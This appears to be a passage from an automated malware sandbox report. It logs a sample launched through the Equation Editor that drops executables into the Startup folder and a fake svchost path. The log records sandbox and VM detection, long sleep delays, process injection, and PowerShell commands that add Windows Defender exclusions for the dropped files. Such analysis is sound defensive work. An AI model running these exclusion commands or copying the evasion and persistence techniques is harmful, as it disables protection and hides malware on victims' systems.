                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      Tries to delay execution (extensive OutputDebugStringW loop)
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe Section loaded: OutputDebugStringW count: 112
                      Source: C:\Users\user\AppData\Roaming\srt.exe Section loaded: OutputDebugStringW count: 112
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe Section loaded: OutputDebugStringW count: 218
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: srt.exe, 00000003.00000002.2165426068.0000000000970000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL/WINE_GET_UNIX_FILE_NAMEQEMU
                      Source: srt.exe, 00000003.00000002.2165426068.0000000000970000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLLUSER
                      Source: C:\Users\user\AppData\Roaming\srt.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2684 Thread sleep time: -120000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\srt.exe TID: 2732 Thread sleep count: 87 > 30
                      Source: C:\Users\user\AppData\Roaming\srt.exe TID: 2696 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2480 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2996 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2576 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2532 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe TID: 2904 Thread sleep count: 86 > 30
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe TID: 3056 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2608 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2688 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2676 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe TID: 2556 Thread sleep count: 88 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2336 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2944 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2532 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1616 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2348 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2052 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2672 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3124 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe TID: 2144 Thread sleep count: 94 > 30
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe TID: 3144 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe Last function: Thread delayed
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_025F096A GetSystemInfo,4_2_025F096A
                      Source: C:\Users\user\AppData\Roaming\srt.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
                      Source: C:\Users\user\AppData\Roaming\srt.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                      Source: C:\Users\user\AppData\Roaming\srt.exe File opened: C:\Users\user\AppData\
                      Source: C:\Users\user\AppData\Roaming\srt.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                      Source: C:\Users\user\AppData\Roaming\srt.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                      Source: C:\Users\user\AppData\Roaming\srt.exe File opened: C:\Users\user\
                      Source: srt.exe, 00000003.00000002.2165426068.0000000000970000.00000004.00000001.sdmp Binary or memory string: !noValueButYesKeySC:\WINDOWS\system32\drivers\VBoxMouse.sys
                      Source: srt.exe, 00000003.00000002.2165426068.0000000000970000.00000004.00000001.sdmp Binary or memory string: VMWAREESOFTWARE\VMware, Inc.\VMware Tools
                      Source: srt.exe, 00000003.00000002.2165426068.0000000000970000.00000004.00000001.sdmp Binary or memory string: vmware
                      Source: powershell.exe, 00000006.00000003.2095308405.00000000002B1000.00000004.00000001.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: srt.exe, 00000003.00000002.2165426068.0000000000970000.00000004.00000001.sdmp Binary or memory string: kernel32.dll/wine_get_unix_file_nameQEMU
                      Source: srt.exe, 00000003.00000002.2165426068.0000000000970000.00000004.00000001.sdmp Binary or memory string: VMwareVBox
                      Source: srt.exe, 00000003.00000002.2165426068.0000000000970000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
                      Source: srt.exe, 00000003.00000002.2165426068.0000000000970000.00000004.00000001.sdmp Binary or memory string: InstallPathKC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\OC:\WINDOWS\system32\drivers\vmmouse.sysMC:\WINDOWS\system32\drivers\vmhgfs.sys
                      Source: C:\Users\user\AppData\Roaming\srt.exe Process information queried: ProcessInformation
                      Source: C:\Users\user\AppData\Roaming\srt.exe Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\srt.exe Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\AppData\Roaming\srt.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\srt.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\srt.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe Memory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe Memory written: unknown base: 400000 value starts with: 4D5A
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\srt.exe C:\Users\user\AppData\Roaming\srt.exe
                      Source: C:\Users\user\AppData\Roaming\srt.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\srt.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\srt.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe'
                      Source: C:\Users\user\AppData\Roaming\srt.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\srt.exe Process created: C:\Users\user\AppData\Roaming\srt.exe C:\Users\user\AppData\Roaming\srt.exe
                      Source: C:\Users\user\AppData\Roaming\srt.exe Process created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe Process created: unknown unknown
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe Process created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\srt.exe Queries volume information: C:\Users\user\AppData\Roaming\srt.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
